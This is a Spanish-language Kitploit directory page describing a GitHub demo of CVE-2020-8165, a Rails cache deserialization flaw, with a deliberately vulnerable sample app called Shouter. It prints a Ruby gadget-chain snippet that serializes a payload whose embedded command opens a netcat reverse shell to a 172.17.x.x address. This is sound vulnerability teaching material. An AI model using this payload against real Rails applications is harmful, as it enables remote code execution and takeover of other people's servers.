Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
cve-2020-8165-demo — Demostración del exploit RCE por deserialización de Rails CVE-2020-8165 con la aplicación realista Shouter, generación de payload en Ruby y envenenamiento de caché Redis. | Kitploit
Herramientas/GitHubGitHub/danielklim/cve-2020-8165-demo
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónDesarrollo de Payloads
GitHubdanielklim/cve-2020-8165-demo

cve-2020-8165-demo

Demostración del exploit RCE por deserialización de Rails CVE-2020-8165 con la aplicación realista Shouter, generación de payload en Ruby y envenenamiento de caché Redis.

Ver Repositorio
11hace 5 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Demostración de CVE-2020-8165

Otra demostración más de CVE-2020-8165, aunque con una implementación más realista que la mayoría.

Antecedentes

CVE-2020-8165

Existe una vulnerabilidad de deserialización de datos no confiables en rails < 5.2.4.3, rails < 6.0.3.1 que puede permitir a un atacante deserializar objetos proporcionados por el usuario en MemCacheStore y RedisCacheStore, potencialmente resultando en un RCE.

Referencias

  • https://hackerone.com/reports/413388
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8165
  • https://nvd.nist.gov/vuln/detail/CVE-2020-8165
  • https://www.cvebase.com/cve/2020/8165
  • https://lab.wallarm.com/exploring-de-serialization-issues-in-ruby-projects-801e0a3e5a0a/

Implementación

La aplicación "Shouter" tiene una función de almacenamiento en caché en su modelo Shout donde las imágenes opcionales que se envían con un shout:string se almacenan en caché en redis y se recuperan desde allí en lugar de la base de datos. Debido a que se utiliza el método vulnerable para interactuar con la caché, esta aplicación es susceptible a CVE-2020-8165, y los resultados del RCE se colocan en el src de las etiquetas en la ruta del panel de control.

Rails.cache.fetch
img

Generando payloads de RCE

El siguiente fragmento generará el payload que necesitas enviar usando exploit.py. Hay algunos matices con el paso de serialización que deben comprenderse para implementar el exploit completamente en Python. Por lo tanto, se necesita Marshal.dump en Ruby para generar el payload exacto (por ahora).

root@kitploit:~
cmd = "Thread.new{system('nc 172.17.188.169 3001 -e /bin/bash')}"
erb = ERB.allocate
erb.instance_variable_set(:@src, cmd)
erb.instance_variable_set(:@lineno, 0)
payload_raw = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new(erb, :result)
payload = Marshal.dump(payload_raw)
p payload
Descargar herramienta